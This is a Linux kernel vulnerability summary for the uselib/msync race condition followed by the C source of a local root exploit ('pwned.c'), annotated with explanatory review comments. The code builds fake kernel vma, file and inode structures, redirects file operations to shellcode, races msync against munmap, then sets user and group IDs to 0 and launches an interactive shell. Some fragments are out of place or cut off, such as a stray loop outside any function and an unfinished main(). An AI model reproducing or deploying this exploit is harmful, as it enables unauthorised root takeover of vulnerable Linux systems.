A race condition in the load_elf_library and binfmt_aout function calls for uselib in Linux kernel 2.4 through 2.4.29-rc2 and 2.6 through 2.6.10 allows local users to execute arbitrary code by manipulating the VMA descriptor.
Exploit:
/*
* pwned.c - linux 2.4 and 2.6 sys_uselib local root exploit. PRIVATE.
* it's not the best one, the ldt approach is definitively better.
* discovered may 2004. no longer private because lorian/cliph/ihaquer
* can lick my balls.
* (c) 2004 sd <sd@fucksheep.org>
* requires approximately 1 GB of free space on the filesystem.
*/
/*
* first create fake vma structs.
*
*
* let's have 3 threads, t1, t2 and t3.
* t1 and t2 have common vm.
*
* t3:
* - wait4sig (will come back from t2)
* - write(fd3, bigmem, bigfile_size)
* - exit()
* t1:
* - fd3 = empty file
* - fd1 = bigfile, writing it took 16 secs
* - bigmem = mmap(NULL, bigfile_size, fd1, 0);
* - t3 = fork()
* - t2 = clone()
* - fd2 = munmap_file, size of ram.
* - mumem = mmap(NULL, munmap_file_size, fd2)
* - mmap(mumem, 4096, ANONYMOUS) // for extending do_brk check
* - mmap lots of vmas
* - close(fd2);
* - create evil lib
* - free lot of vmas
* - sig @ t2
* - evil_lib->do_munmap(mumem + 4096, munmap_file_size - 4096);
* - sem = 1
* - waitpid
* t2:
* - wait4sig
* - sleep(100msec)
* - mmap(mumem, fd3, 4096) // this is being protected by i_sem !
* - sendsig @ t3
* - sleep(100msec)
* - if (sem) error
* - msync(mumem, 8192) - will wait for write() to finish. munmap finishes by that
* time
* - if (!sem) error
* - if it does return we failed, otherwise shell.
*
*/
/* 16 KiB static buffer; presumably the stack handed to clone() for the
 * helper thread (the clone() call itself is not visible here). */
static char thread_stack[16384];
/* File descriptors. Per the plan comment at the top of the file:
 * fd1 = the big file, fd2 = the "munmap" file, fd3 = an initially empty file.
 * In the visible code only fd3 is used (mapped by thread()). */
int fd1, fd2, fd3;
/* Scratch buffer of MAPSTEP bytes (MAPSTEP is defined elsewhere). */
char buf[MAPSTEP];
/* Not referenced in the visible code. */
int notincore;
/* PIDs of the helper processes/threads; killall() sends SIGKILL to each one
 * that differs from the caller's own PID. Assigned outside this view. */
int t4;
int t3;
int t2;
/* Size and address of the "big" region (plan comment: bigmem is an mmap of
 * fd1). Assigned outside this view. */
int bigsize = 0;
char *bigmem = NULL;
/* Size and address of the region whose third page thread() remaps from fd3
 * and later passes to msync(). Assigned outside this view. */
int swapsize = 0;
char *swapmem = NULL;
/* Base address used by build_fakevma() for the fake vma's start/end
 * (BASE is defined elsewhere). */
char *base = BASE;
/* Start of the area in which thread() creates VMAFILL one-page anonymous
 * mappings. Assigned outside this view. */
char *vmamem;
/* Set to 1 by sighand(). */
int gotsig = 0;
/* Progress flag checked by thread(); it is only ever cleared in the visible
 * code, so it is presumably set by the main flow ("sem = 1" in the plan). */
int sem = 0;
/* Abort helper: forwards the calling function name and line to _cleanup(). */
#define cleanup() _cleanup(__func__, __LINE__)
/*
 * Send SIGKILL to each helper process (t2, t3, t4) other than the caller.
 *
 * A PID slot that was never filled in (0) or that holds a failed
 * fork()/clone() result (-1) is skipped: kill(0, ...) would signal the
 * caller's entire process group and kill(-1, ...) every process the caller
 * is allowed to signal, neither of which is ever the intent here.
 *
 * Errors from kill() are ignored on purpose: a helper may already have
 * exited by the time this runs.
 */
void killall(void)
{
    const int helpers[] = { t2, t3, t4 };
    const int self = getpid();
    unsigned int i;

    for (i = 0; i < sizeof helpers / sizeof helpers[0]; i++) {
        /* Only real, positive PIDs that are not our own are valid targets. */
        if (helpers[i] > 0 && helpers[i] != self)
            kill(helpers[i], SIGKILL);
    }
}
/*
 * Abort path, normally reached through the cleanup() macro.
 *
 * name: name of the calling function (for the log line)
 * line: source line of the call (for the log line)
 *
 * Logs the call site, kills the helper processes, removes the work files
 * and terminates the process with status 1. Never returns.
 */
void _cleanup(const char *name, int line)
{
    /* Work files, removed in this order. */
    const char *const leftovers[] = {
        SHAREFILE, SWAPFILE, EATFILES, EATFILE, LIBFILE
    };
    unsigned int idx;

    printf("cleanup called! from %s:%d\n", name, line);
    killall();

    for (idx = 0; idx < sizeof leftovers / sizeof leftovers[0]; idx++)
        unlink(leftovers[idx]);

    _exit(1);
}
/* Fixed user-space address at which the fake structure block is expected. */
#define FAKES_BASE 0x50000000
/*
 * One contiguous block holding every fake object that build_fakevma()
 * links together. The mm_struct / vma_struct / file_struct / dentry_struct
 * types are this program's own declarations (defined elsewhere), not the
 * kernel's.
 */
struct fakes {
/* Not referenced in the visible code. */
int t1;
struct mm_struct mm;
struct vma_struct vma;
struct file_struct file;
struct dentry_struct dentry;
/* Fake mapping object used on the 2.4 path (reached through inode[]). */
unsigned long mapping24[128];
/* Fake mapping object used on the 2.6 path (reached through file.f_mapping[]). */
unsigned long mapping26[128];
/* Fake inode: build_fakevma() sets words 0..31 to 1 and words 32..127 to
 * the address of mapping24. */
unsigned long inode[128];
/* Fake page directory; left all-zero by build_fakevma(). */
unsigned long pgd[1024];
/* Pointer table; every slot is set to the address of shellcode[] below. */
void *ptrs[128];
/* Copy of the external `shellcode` array. The sizeof operand still names
 * that external object here, because the member's own name only comes
 * into scope after its declarator is complete. */
char shellcode[sizeof(shellcode)];
/* Not referenced in the visible code. */
int t2;
};
/* The block lives at FAKES_BASE. Nothing visible here maps that address, so
 * the mapping is presumably created elsewhere before build_fakevma() runs. */
struct fakes *fakes = (void *) FAKES_BASE;
/*
 * Build the fake vma which, per the original author's note, msync_interval
 * will get, together with every object reachable from it (mm, file, dentry,
 * inode, mappings and the operations table). A lot of things have to be
 * emulated.
 *
 * Takes no arguments and returns nothing; operates on the global `fakes`
 * block and reads the globals `base` and `shellcode`.
 * Assumes the memory at `fakes` is already mapped and writable -- the
 * mapping is not set up in this function.
 */
void build_fakevma()
{
int i;
/* Start from an all-zero block; everything not set below stays 0. */
memset(fakes, 0, sizeof(*fakes));
/* The fake vma covers exactly one page: [base + PAGE_SIZE, base + 2 * PAGE_SIZE).
 * NOTE(review): the pointer is cast to `unsigned`, which truncates on
 * targets where pointers are wider than unsigned int. */
fakes->vma.vm_end = (unsigned)( base + PAGE_SIZE * 2);
fakes->vma.vm_start = (unsigned)(base + PAGE_SIZE);
/* we need this to let the kernel enter the fs callback we control */
fakes->vma.vmflags = 0xf;
fakes->vma.file = &fakes->file;
fakes->vma.mm = &fakes->mm;
/* All three pgd slots of the fake mm point at the same fake page directory
 * (presumably covering different struct layouts -- confirm against the
 * mm_struct declaration). */
fakes->mm.pgd1 = fakes->pgd;
fakes->mm.pgd2 = fakes->pgd;
fakes->mm.pgd3 = fakes->pgd;
/* there are no pmd's */
/* (redundant with the whole-block memset above, kept as in the original) */
memset(fakes->pgd, 0, sizeof(fakes->pgd));
/* initialize potential spinlock on smp */
for (i = 0; i < 32; i++)
fakes->mm.locks[i] = 1;
/* 2.4 goes thru dentry */
fakes->file.dentry = &fakes->dentry;
fakes->dentry.inode1 = fakes->inode;
fakes->dentry.inode2 = fakes->inode;
/* this will be i_sem */
for (i = 0; i < 32; i++)
fakes->inode[i] = 1;
/* and this reference to i_mapping */
for (i = 32; i < 128; i++)
fakes->inode[i] = (unsigned long) fakes->mapping24;
/* 2.6 goes thru f_mapping */
for (i = 0; i < 64; i++)
fakes->file.f_mapping[i] = fakes->mapping26;
/* prepare mappings for both 2.4 and 2.6 */
/* mapping on 2.6 requires to have ->host defined,
and backing_dev_info pointing to a bunch of nonzero memory.
also the locked_pages list must point to itself (empty) */
/* word 0: the fake inode */
fakes->mapping26[0] = (unsigned long) fakes->inode;
/* words 1..3: zero */
for (i = 1; i <= 3; i++)
fakes->mapping26[i] = 0;
/* words 4..15: each word holds its own address (self-referencing) */
for (i = 4; i < 16; i++)
fakes->mapping26[i] = (unsigned long) &fakes->mapping26[i];
/* words 16..30: address of the pointer table */
for (i = 16; i <= 30; i++)
fakes->mapping26[i] = (unsigned long) fakes->ptrs;
/* mapping on 2.4 requires only having a mapping consisting of empty lists */
/* words 0..30: each word holds its own address ... */
for (i = 0; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) &fakes->mapping24[i];
/* ... then words 23..30 are overwritten with the address of the pointer table */
for (i = 23; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) fakes->ptrs;
/* ok, now setup fops->f_sync to our evil fsync */
/* Every slot of the table holds the same address, so the exact slot index
 * that ends up being used does not matter. */
fakes->file.op = fakes->ptrs;
for (i = 0; i < 128; i++)
fakes->ptrs[i] = fakes->shellcode;
/* Copy the external `shellcode` array into the block. */
memcpy(fakes->shellcode, shellcode, sizeof(shellcode));
}
for (i = 0; i < MAPSTEP; i += sizeof(void *))
*p++ = vma; /* !!! */
}
/*
 * Signal handler: records that a signal arrived by raising the global
 * `gotsig` flag. The signal number itself is not used.
 */
static void sighand(int d)
{
    (void)d;    /* signal number is irrelevant */
    gotsig = 1;
}
/*
 * Entry point of the helper thread (it appears to be "t2" in the plan comment
 * at the top of the file).
 *
 * d: unused.
 *
 * Sequence visible here: wait for a signal, sleep, map one page of fd3 over
 * swapmem + 2 pages halfway through creating VMAFILL anonymous one-page
 * mappings, signal another process, sleep again, unmap the filler mappings
 * and msync() the region. The statement order and the sleeps are the logic
 * of this function; do not reorder.
 *
 * Does not return normally: it ends in _exit(0), in cleanup() (exit status 1),
 * or is replaced by /bin/sh.
 */
static int thread(void *d)
{
/* NOTE(review): this local shadows the global t3 and is never assigned in
 * this function, so sendsig(t3) below reads an indeterminate value --
 * confirm whether the global was intended. */
int t3;
/* NOTE(review): also receives mmap()'s pointer result and is printed with
 * %p below; an int is narrower than a pointer on LP64 targets. */
int ret;
int i;
/* Block until signalled (wait4sig() is defined elsewhere). */
wait4sig();
printf("(sleep1)\n");
usleep(300000);
printf("(sleep1 finished)\n");
printf("trying to mmap back the evil page\n");
/* Create VMAFILL one-page anonymous mappings at vmamem; exactly at the
 * halfway point, additionally map the first page of fd3 (shared, fixed)
 * over the third page of swapmem. */
for (i = 0; i < VMAFILL; i++) {
if (i == VMAFILL/2)
ret=mmap(swapmem + PAGE_SIZE * 2, PAGE_SIZE, PROT_READ|PROT_WRITE,MAP_SHARED|MAP_FIXED, fd3, 0);
/* Odd pages are READ|WRITE, even pages READ|EXEC; the alternating
 * protections presumably keep neighbouring mappings from being merged.
 * NOTE(review): MAP_FIXED is not passed here, so vmamem + i * PAGE_SIZE is
 * only a hint, and the result is not checked. */
mmap(vmamem + i * PAGE_SIZE, PAGE_SIZE, PROT_READ|((i&1)?(PROT_WRITE):(PROT_EXEC)),
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
}
/* Write one byte into the page that was just mapped from fd3. */
swapmem[PAGE_SIZE*2] = 'x';
printf("%p, evil mapped\n",ret);
printf("(sleep2)\n");
/* sem already being set at this point counts as failure. */
if (sem)
cleanup();
/* Wake the other process (see the note on the local t3 above). */
sendsig(t3);
usleep(300000);
printf("(sleep2 finished)\n");
if (sem)
cleanup();
/* Drop all the filler mappings again in one call. */
munmap(vmamem, VMAFILL * PAGE_SIZE);
printf("doing msync\n");
printf("still doing msync\n");
/* Synchronous msync over four pages starting at the remapped page. */
ret = msync(swapmem + PAGE_SIZE * 2, PAGE_SIZE * 4, MS_SYNC);
printf("finished msync, %d, errno=%d\n", ret, errno);
/* errno 123 is treated as the success marker; presumably this value is
 * produced by the injected code rather than by a genuine msync() failure --
 * cannot be confirmed from this view. */
if (ret == -1 && errno == 123) {
sem = 0;
killall();
printf("y4'r3 1uCky k1d!\n");
setresuid(0, 0, 0);
setresgid(0, 0, 0);
execl("/bin/sh", "sh", "-i", NULL);
/* Only reached if execl() failed. */
printf("execve failed %d\n", errno);
}
/* msync() came back without the marker and sem is still clear: failure. */
if (!sem) {
printf(":(\n");
cleanup();
}
_exit(0);
}
int main(int argc, char *argv[])
{
int i, n;
char *dummy = DBASE;
printf("linux kernel msync race condition\nbug discovered by sd,
further research by sd and *****\nthis is development-in-progress code,
redistribution prohibited!\n=============================================\n");